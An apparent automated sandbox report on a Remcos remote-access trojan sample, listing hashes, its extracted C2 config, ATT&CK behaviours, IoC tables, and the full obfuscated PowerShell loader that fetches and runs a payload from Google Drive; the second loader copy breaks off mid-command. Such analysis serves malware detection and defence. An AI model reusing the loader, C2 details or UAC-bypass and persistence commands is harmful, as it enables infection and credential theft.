remcos | 1e74e14032fe7b84a6285d72cfea681f4ec1d0bffe896f02fac5f0c5e5b96060

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-11-2024 02:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1e74e14032fe7b84a6285d72cfea681f4ec1d0bffe896f02fac5f0c5e5b96060.vbs
Size

33KB
MD5

b9d77e317447cf7b4fc1b538d04a35d7
SHA1

4bfff79ba434d7c5a508f9ba2720f4ef47cfecec
SHA256

1e74e14032fe7b84a6285d72cfea681f4ec1d0bffe896f02fac5f0c5e5b96060
SHA512

9691361f42668c8dcf9764ac86ad355c5039ca927140ce732452cba7df12bad70ff46c87c54cd8ae6e6cf4673e3bc57894663c8b301f0e40344c0b21dab20ce7
SSDEEP

768:EA9as2DrXeg09BTUUsKNq4Hm8hZn6TgXzwbVV+E2rEJ9YnCmw6fd:D9asyevU844HT/6azCkE2oJIu6d

Score

10^/10

remcos remotehost collection credential_access discovery evasion persistence rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

8766e34g8.duckdns.org:3782

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-93TSMD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 2 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/1972-80-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/4452-83-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1972-80-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

Blocklisted process makes network request 13 IoCs

flow	pid	Process
3	916	WScript.exe
9	1960	powershell.exe
11	1960	powershell.exe
26	1304	msiexec.exe
28	1304	msiexec.exe
31	1304	msiexec.exe
33	1304	msiexec.exe
34	1304	msiexec.exe
41	1304	msiexec.exe
48	1304	msiexec.exe
49	1304	msiexec.exe
50	1304	msiexec.exe
52	1304	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
4792	Chrome.exe
1968	msedge.exe
3328	msedge.exe
1436	msedge.exe
936	Chrome.exe
2052	Chrome.exe
1716	Chrome.exe
4240	msedge.exe
2456	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Aidless125% -windowstyle 1 $Grangiveligt=(gp -Path 'HKCU:\\Software\\Produktionsdatabaser11\\').Monociliated;%Aidless125% ($Grangiveligt)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	drive.google.com
26	drive.google.com
8	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1304	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2128	powershell.exe
1304	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1304 set thread context of 952	1304	msiexec.exe	104
PID 1304 set thread context of 1972	1304	msiexec.exe	105
PID 1304 set thread context of 4452	1304	msiexec.exe	106

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2308	reg.exe
3548	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1960	powershell.exe
1960	powershell.exe
2128	powershell.exe
2128	powershell.exe
2128	powershell.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
4452	msiexec.exe
4452	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
936	Chrome.exe
936	Chrome.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
2128	powershell.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4240	msedge.exe
4240	msedge.exe
4240	msedge.exe
4240	msedge.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	4452	msiexec.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe
Token: SeShutdownPrivilege	936	Chrome.exe
Token: SeCreatePagefilePrivilege	936	Chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
936	Chrome.exe
4240	msedge.exe
4240	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1304	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 916 wrote to memory of 1960	916	WScript.exe	82
PID 916 wrote to memory of 1960	916	WScript.exe	82
PID 2128 wrote to memory of 1304	2128	powershell.exe	93
PID 2128 wrote to memory of 1304	2128	powershell.exe	93
PID 2128 wrote to memory of 1304	2128	powershell.exe	93
PID 2128 wrote to memory of 1304	2128	powershell.exe	93
PID 1304 wrote to memory of 2700	1304	msiexec.exe	94
PID 1304 wrote to memory of 2700	1304	msiexec.exe	94
PID 1304 wrote to memory of 2700	1304	msiexec.exe	94
PID 2700 wrote to memory of 2308	2700	cmd.exe	96
PID 2700 wrote to memory of 2308	2700	cmd.exe	96
PID 2700 wrote to memory of 2308	2700	cmd.exe	96
PID 1304 wrote to memory of 1448	1304	msiexec.exe	98
PID 1304 wrote to memory of 1448	1304	msiexec.exe	98
PID 1304 wrote to memory of 1448	1304	msiexec.exe	98
PID 1448 wrote to memory of 3548	1448	cmd.exe	100
PID 1448 wrote to memory of 3548	1448	cmd.exe	100
PID 1448 wrote to memory of 3548	1448	cmd.exe	100
PID 1304 wrote to memory of 936	1304	msiexec.exe	101
PID 1304 wrote to memory of 936	1304	msiexec.exe	101
PID 936 wrote to memory of 900	936	Chrome.exe	102
PID 936 wrote to memory of 900	936	Chrome.exe	102
PID 1304 wrote to memory of 3932	1304	msiexec.exe	103
PID 1304 wrote to memory of 3932	1304	msiexec.exe	103
PID 1304 wrote to memory of 3932	1304	msiexec.exe	103
PID 1304 wrote to memory of 952	1304	msiexec.exe	104
PID 1304 wrote to memory of 952	1304	msiexec.exe	104
PID 1304 wrote to memory of 952	1304	msiexec.exe	104
PID 1304 wrote to memory of 952	1304	msiexec.exe	104
PID 1304 wrote to memory of 1972	1304	msiexec.exe	105
PID 1304 wrote to memory of 1972	1304	msiexec.exe	105
PID 1304 wrote to memory of 1972	1304	msiexec.exe	105
PID 1304 wrote to memory of 1972	1304	msiexec.exe	105
PID 1304 wrote to memory of 4452	1304	msiexec.exe	106
PID 1304 wrote to memory of 4452	1304	msiexec.exe	106
PID 1304 wrote to memory of 4452	1304	msiexec.exe	106
PID 1304 wrote to memory of 4452	1304	msiexec.exe	106
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107
PID 936 wrote to memory of 3028	936	Chrome.exe	107

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1e74e14032fe7b84a6285d72cfea681f4ec1d0bffe896f02fac5f0c5e5b96060.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$vandresourcers='Borgerpligts';;$Theobromic202='Fukssvanses';;$Dunt='Absurdisten';;$Milieuomraadets='Chrysophyllum';;$Diamantbrylluppernes='Catalyses';;$Clappered=$host.Name;function Sastrugi($Dampbadenes){If ($Clappered) {$Arkitekttegningens=4} for ($Regionalprogrammerne=$Arkitekttegningens;;$Regionalprogrammerne+=5){if(!$Dampbadenes[$Regionalprogrammerne]) { break }$Forumers+=$Dampbadenes[$Regionalprogrammerne]}$Forumers}function Svmmeprvens($Remobilizing){ .($Linguae) ($Remobilizing)}$Sangpdagoger=Sastrugi 'Percn,ndeeBlaattele. SkoWUforeMa eBTabuCremoLGr uI SeqE vernOleat';$Radialia=Sastrugi ' legMUnbro Broz ProiBetol PoslYikeaSkde/';$Goatherd=Sastrugi 'van T Fo.lNinns Kon1Sikk2';$Afrundendes='Tewe[ PusN udsELu ut Han.JuleSBogoEVi eRBusbvfrieIwhizC ,umESkpppp,rso Stai eucN TodtDyveM aiaFo nn Jera LivgSemieSnjarenig]G aa:Topp:BrnlSVa be G,sC afsUFotor H,ciFlleTTrepY EupPKu,sRAntiO.orgTLeveOKlbecForsOSm eLLssa=Di e$ D mGphotoPitiAMadoT ConH,ortETyr.RoverD';$Radialia+=Sastrugi 'Kikk5Ethe. Sm.0Eksk Unbu(VedeWReiniHovenD.spd A ioFro wgubbsMili EsmaNIn xTFor Smer1 T,i0Verd.Sl d0Data; F a OculWSulkiHjemnKbsv6 Gon4stri;Byre ,onbxZ go6Thor4Mini;D al Hulkr.ddav.eme:john1L,ft3 fin1Port.S zi0Unco)Inst AloeGholleC,vecAtikkFragoPebb/ Jos2Reno0srsy1Prin0Pl s0Skrn1Verd0Tr n1Rood ElleFBehoiWrearRep,e KanfobidoS.lmx rif/Braz1 Row3Uans1Pakn. Ba.0';$Tremoloerne=Sastrugi ' Lydu nrrSSalvEAfgir Syn-SwarATandGLid EIrriN vett';$Pteropod=Sastrugi 'Vil hE octShantbe,apKupfsDele:T mm/Werw/BlaadOverr Cati SubvPu teP le.RollgKaido Bruo DusgHeadlKunseChry. AnkcNatmosterm ,gl/R gauChasc Bot?Timee L nxUdrup tato.ratr L.mt Val=,enodPropoP,rewAll nG,odlBittoPiecaSupedU em& Pe igavod U s= Re 1SundbgreeqStilSRatig Vesg bouW InscOpprlTempw TagLFlaa5 Skol hotOApprgfritRGasbfBro LPunktEt,mU aywlDivaFHej PEman8AnviWDy nFbe.mlEdibQ ropQSar 6S ygG DyrStune3';$Wac=Sastrugi 'Dd s>';$Linguae=Sastrugi 'Hdr iCapceOpdyx';$Onomancy='correlativity';$Begrnsende='\Hovedaktionrer179.Lin';Svmmeprvens (Sastrugi ' E,a$MultGHalvl ImpoAutobHo oaAltel Mal:CertKK deoFrakMTrenM Trau O tNYndla ForrHejddEksa=Afbi$Stere ifeNAdviVLand:HoopaIn.epF,roPPos dsemia CheTudspa Bur+Stal$Demob IchEHyldGGrn RA deNCaneSCalaEKnsbnTakkd nonE');Svmmeprvens (Sastrugi ' Des$ParagGlovlI dhoErfab StiAAntiLS ec: A.kPFlisR SamOSa,mFForelpastiRnt,GUnmea,ritCO tfIFiskEForfS S,p=Kigs$Saalp sirTPenueatrorEmbrO ejlPStraOPelidGlam.PseuSConcpBldslSluiIbasitTim.(stat$TortWTarvAKogecafho)');Svmmeprvens (Sastrugi $Afrundendes);$Pteropod=$Profligacies[0];$Batistet=(Sastrugi ' pol$To hGPartLMilloSilvBarmoaStraL Max:preas SerC howaComppSoldIFormn A pGBo,d=M,nunSoevEInstwMerg- BlaOTeleBHitcJJay EunciCBefrt ara TiteSGkkeYOpinsProptEtereAcr.mprec. fdr$ .ucsManzA Ko NSottGAdrePEigeD lbeaAttaG eho jerGTakteStatR');Svmmeprvens ($Batistet);Svmmeprvens (Sastrugi 'Unra$ ,veS MaucLovpa SoupRetsiWappnStimg Dra.DeciHNakoeUmi,a LogdFej eDracrIsocs Dik[V lu$ReckTLygtrChi eStabmKl.noRaadlTaboo Smae hewr Radn Bile Alo]Forl=In.r$StyrRCantaR,todbagli areagenelStariBer.a');$Resynthetize=Sastrugi 'Lewd$SystSAnglcCravais gpFadeiE kanCruegCabb. MytD.oploMalcwVashnGliplCo moRudka randO raFDemii Tell geneNedd(Sn.k$.arsP Famt dvieCatsrSporo uscpJordo atcdArgu,Work$UdlgAVgten AnsaProdlW igyStils roueC immInfloSo.idPreleDemolAfl.)';$Analysemodel=$Kommunard;Svmmeprvens (Sastrugi ' Ch $Ste,GPakel nugOClanBTrilaTupiLSols:St.lETabup,ratiPotalFal aInsttMoo,O AntRFadg=Omen(H,maTLuppEVgtiSCanotMaal- s.apAfpoaSt mt F lHRa,k S,ge$ SinaListN onaH lvlrumky,enhsSa deSnidMStegOPir,d LubEU polB.go)');while (!$Epilator) {Svmmeprvens (Sastrugi 'Slud$NighgMedil Afio ilbRe ia UdglLitt:CremPMisdrEtheeGy nsGenec Tatrpa aiOverpSal tP ngiStrob DobiRegalChiriPirotCarpyTork=Pole$SkirTMameaTandrFuldaDr vz Grue Mitd') ;Svmmeprvens $Resynthetize;Svmmeprvens (Sastrugi 'ShaispermT Idea aluRStunTP tc-Fes,SOverL SocESmd,eRevapBlok Ug,d4');Svmmeprvens (Sastrugi ' Kn.$Co.eGSa iLRubbOSyntbUdflAGrapLLand:Fa aEeisepSpgeIByggl HexAGulst Inho Em rbl n=H.rp(UndetGoddeSignSFl ct Tar- TilP FalAEnvoTB nihSelv at$Ble,AukamNRomaaCan.LRu aYA kesN dbEU.coMBi.loP otDsoliEMedlLfal )') ;Svmmeprvens (Sastrugi 'Doec$P.angAfg l LevO S rBColoAStablVaab: V nsBri,a UndI FroL MisOAnnerUndeiColozOpviI FleN I bGHe dsHydr=.rbe$OverGCanvlHe,oo DecBOverAEquiLKos,:IndssNvnit IrlUSrb,t DumT InteBoatrBivai Id HF emOMiaspfragPHenbEGamb+Hind+De u%Grim$,nnapAfprR AnaOFokufEle,LId lIBankgRadmaBugpc Teli DisEPrmismen .PneuC SimOSemuUMagtN ncT') ;$Pteropod=$Profligacies[$Sailorizings]}$Regionalprogrammernendsmuglingerne=309529;$Disjunctor=31536;Svmmeprvens (Sastrugi 'Meta$SmerGOrnil Kloo Harb ajaMedilDisb:FrarUUdliDLvsplIsoaB forsUsmiTPolyiBeauD .ens Seap KatUSta.nUncaKAnn.tUn rEc rrTB ne stje=Unan GigaG gtee vertBarb- Ba cBls.OKnocnUn rtDaggEYuccNdrudT so Pot $S udAu,ben pa,AT reLOpskyT rbSUtaleR mmMSemiOIn edIndfeOverL');Svmmeprvens (Sastrugi 'Tilb$ Lnug Bygl ,vaost.ib ,asaBonzlNond:.eloK AncaIdellParnk AteuK,rdnnerdlScruaHyp aH rrr lsf Eng=Unfa Bom,[OrgaSKompy Pols Prot KoreRolemBall.hydrC A hoLacqnUnr,vDataeMailrVe etAnke] Das:Ka.t: CesFHeltr Ostosn gmChamBIslaaPaafs .iseKaka6 Dek4PoliSUnuntEdderOveri Ov n klugPhi (Fo s$BaasU DjvdBerel ,adbAbsos untAngeiKarldArunsS inpKlenu Catn CytkGenotB oweSk ut Hel)');Svmmeprvens (Sastrugi 'M lt$Fri.gUds lLeptoGalmB nodAOverlKame:SlagS BurTTrosASk naIndottrekR eulOImmul HakD halEBurgNKanusIn e ,lg=Livr Komm[TomnsBa.tyWreas UnpT OveEBemamUd n. PsaTVerde ernX conTKopo.VoldEHyp,NNonicstnnomar.dSpk,IFotonB.atGKigg]Spoo: Pan:ChorAwomesBillCCirciUndii hai.An.igIs rEScarTNyopSAlfrtInadrGashIK mmNnic g r.g( Mar$DeraKEarmAAposl RevKOb tUFl,bnTe elKonsa .mka VesRGraf)');Svmmeprvens (Sastrugi ' Skr$VictgIndll Ci.O aksB teoa CorlLi e:GufscKnska SpuVM,ntaSluklBypa= Cha$ Ep,SGranT TacA.isaAKlasTAa,eROnomOadvaL rieDReine.eriNstn,sen a. ImpsaandUT,lebP,rnsSport SlarUndeIStraN GengSecc(Skal$Und.rKny.EP lhGBindiUnexocof.NS avAIwbelUndiPPhilr oldoRoitgSkovRHotnaBee mAestMSyr ESmugRPrecnVkkeE Fr nBlacd eouS PenmPavoUGagcg upilValgIBre NNondg CapeSt,eRHur,n,ilbETrip,out,$ Ve dCom iMonoS PosjBet U EgoNSma cSammTDissO ProR tr )');Svmmeprvens $Caval;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$vandresourcers='Borgerpligts';;$Theobromic202='Fukssvanses';;$Dunt='Absurdisten';;$Milieuomraadets='Chrysophyllum';;$Diamantbrylluppernes='Catalyses';;$Clappered=$host.Name;function Sastrugi($Dampbadenes){If ($Clappered) {$Arkitekttegningens=4} for ($Regionalprogrammerne=$Arkitekttegningens;;$Regionalprogrammerne+=5){if(!$Dampbadenes[$Regionalprogrammerne]) { break }$Forumers+=$Dampbadenes[$Regionalprogrammerne]}$Forumers}function Svmmeprvens($Remobilizing){ .($Linguae) ($Remobilizing)}$Sangpdagoger=Sastrugi 'Percn,ndeeBlaattele. SkoWUforeMa eBTabuCremoLGr uI SeqE vernOleat';$Radialia=Sastrugi ' legMUnbro Broz ProiBetol PoslYikeaSkde/';$Goatherd=Sastrugi 'van T Fo.lNinns Kon1Sikk2';$Afrundendes='Tewe[ PusN udsELu ut Han.JuleSBogoEVi eRBusbvfrieIwhizC ,umESkpppp,rso Stai eucN TodtDyveM aiaFo nn Jera LivgSemieSnjarenig]G aa:Topp:BrnlSVa be G,sC afsUFotor H,ciFlleTTrepY EupPKu,sRAntiO.orgTLeveOKlbecForsOSm eLLssa=Di e$ D mGphotoPitiAMadoT ConH,ortETyr.RoverD';$Radialia+=Sastrugi 'Kikk5Ethe. Sm.0Eksk Unbu(VedeWReiniHovenD.spd A ioFro wgubbsMili EsmaNIn xTFor Smer1 T,i0Verd.Sl d0Data; F a OculWSulkiHjemnKbsv6 Gon4stri;Byre ,onbxZ go6Thor4Mini;D al Hulkr.ddav.eme:john1L,ft3 fin1Port.S zi0Unco)Inst AloeGholleC,vecAtikkFragoPebb/ Jos2Reno0srsy1Prin0Pl s0Skrn1Verd0Tr n1Rood ElleFBehoiWrearRep,e KanfobidoS.lmx rif/Braz1 Row3Uans1Pakn. Ba.0';$Tremoloerne=Sastrugi ' Lydu nrrSSalvEAfgir Syn-SwarATandGLid EIrriN vett';$Pteropod=Sastrugi 'Vil hE octShantbe,apKupfsDele:T mm/Werw/BlaadOverr Cati SubvPu teP le.RollgKaido Bruo DusgHeadlKunseChry. AnkcNatmosterm ,gl/R gauChasc Bot?Timee L nxUdrup tato.ratr L.mt Val=,enodPropoP,rewAll nG,odlBittoPiecaSupedU em& Pe igavod U s= Re 1SundbgreeqStilSRatig Vesg bouW InscOpprlTempw TagLFlaa5 Skol hotOApprgfritRGasbfBro LPunktEt,mU aywlDivaFHej PEman8AnviWDy nFbe.mlEdibQ ropQSar 6S ygG DyrStune3';$Wac=Sastrugi 'Dd s>';$Linguae=Sastrugi 'Hdr iCapceOpdyx';$Onomancy='correlativity';$Begrnsende='\Hovedaktionrer179.Lin';Svmmeprvens (Sastrugi ' E,a$MultGHalvl ImpoAutobHo oaAltel Mal:CertKK deoFrakMTrenM Trau O tNYndla ForrHejddEksa=Afbi$Stere ifeNAdviVLand:HoopaIn.epF,roPPos dsemia CheTudspa Bur+Stal$Demob IchEHyldGGrn RA deNCaneSCalaEKnsbnTakkd nonE');Svmmeprvens (Sastrugi ' Des$ParagGlovlI dhoErfab StiAAntiLS ec: A.kPFlisR SamOSa,mFForelpastiRnt,GUnmea,ritCO tfIFiskEForfS S,p=Kigs$Saalp sirTPenueatrorEmbrO ejlPStraOPelidGlam.PseuSConcpBldslSluiIbasitTim.(stat$TortWTarvAKogecafho)');Svmmeprvens (Sastrugi $Afrundendes);$Pteropod=$Profligacies[0];$Batistet=(Sastrugi ' pol$To hGPartLMilloSilvBarmoaStraL Max:preas SerC howaComppSoldIFormn A pGBo,d=M,nunSoevEInstwMerg- BlaOTeleBHitcJJay EunciCBefrt ara TiteSGkkeYOpinsProptEtereAcr.mprec. fdr$ .ucsManzA Ko NSottGAdrePEigeD lbeaAttaG eho jerGTakteStatR');Svmmeprvens ($Batistet);Svmmeprvens (Sastrugi 'Unra$ ,veS MaucLovpa SoupRetsiWappnStimg Dra.DeciHNakoeUmi,a LogdFej eDracrIsocs Dik[V lu$ReckTLygtrChi eStabmKl.noRaadlTaboo Smae hewr Radn Bile Alo]Forl=In.r$StyrRCantaR,todbagli areagenelStariBer.a');$Resynthetize=Sastrugi 'Lewd$SystSAnglcCravais gpFadeiE kanCruegCabb. MytD.oploMalcwVashnGliplCo moRudka randO raFDemii Tell geneNedd(Sn.k$.arsP Famt dvieCatsrSporo uscpJordo atcdArgu,Work$UdlgAVgten AnsaProdlW igyStils roueC immInfloSo.idPreleDemolAfl.)';$Analysemodel=$Kommunard;Svmmeprvens (Sastrugi ' Ch $Ste,GPakel nugOClanBTrilaTupiLSols:St.lETabup,ratiPotalFal aInsttMoo,O AntRFadg=Omen(H,maTLuppEVgtiSCanotMaal- s.apAfpoaSt mt F lHRa,k S,ge$ SinaListN onaH lvlrumky,enhsSa deSnidMStegOPir,d LubEU polB.go)');while (!$Epilator) {Svmmeprvens (Sastrugi 'Slud$NighgMedil Afio ilbRe ia UdglLitt:CremPMisdrEtheeGy nsGenec Tatrpa aiOverpSal tP ngiStrob DobiRegalChiriPirotCarpyTork=Pole$SkirTMameaTandrFuldaDr vz Grue Mitd') ;Svmmeprvens $Resynthetize;Svmmeprvens (Sastrugi 'ShaispermT Idea aluRStunTP tc-Fes,SOverL SocESmd,eRevapBlok Ug,d4');Svmmeprvens (Sastrugi ' Kn.$Co.eGSa iLRubbOSyntbUdflAGrapLLand:Fa aEeisepSpgeIByggl HexAGulst Inho Em rbl n=H.rp(UndetGoddeSignSFl ct Tar- TilP FalAEnvoTB nihSelv at$Ble,AukamNRomaaCan.LRu aYA kesN dbEU.coMBi.loP otDsoliEMedlLfal )') ;Svmmeprvens (Sastrugi 'Doec$P.angAfg l LevO S rBColoAStablVaab: V nsBri,a UndI FroL MisOAnnerUndeiColozOpviI FleN I bGHe dsHydr=.rbe$OverGCanvlHe,oo DecBOverAEquiLKos,:IndssNvnit IrlUSrb,t DumT InteBoatrBivai Id HF emOMiaspfragPHenbEGamb+Hind+De u%Grim$,nnapAfprR AnaOFokufEle,LId lIBankgRadmaBugpc Teli DisEPrmismen .PneuC SimOSemuUMagtN ncT') ;$Pteropod=$Profligacies[$Sailorizings]}$Regionalprogrammernendsmuglingerne=309529;$Disjunctor=31536;Svmmeprvens (Sastrugi 'Meta$SmerGOrnil Kloo Harb ajaMedilDisb:FrarUUdliDLvsplIsoaB forsUsmiTPolyiBeauD .ens Seap KatUSta.nUncaKAnn.tUn rEc rrTB ne stje=Unan GigaG gtee vertBarb- Ba cBls.OKnocnUn rtDaggEYuccNdrudT so 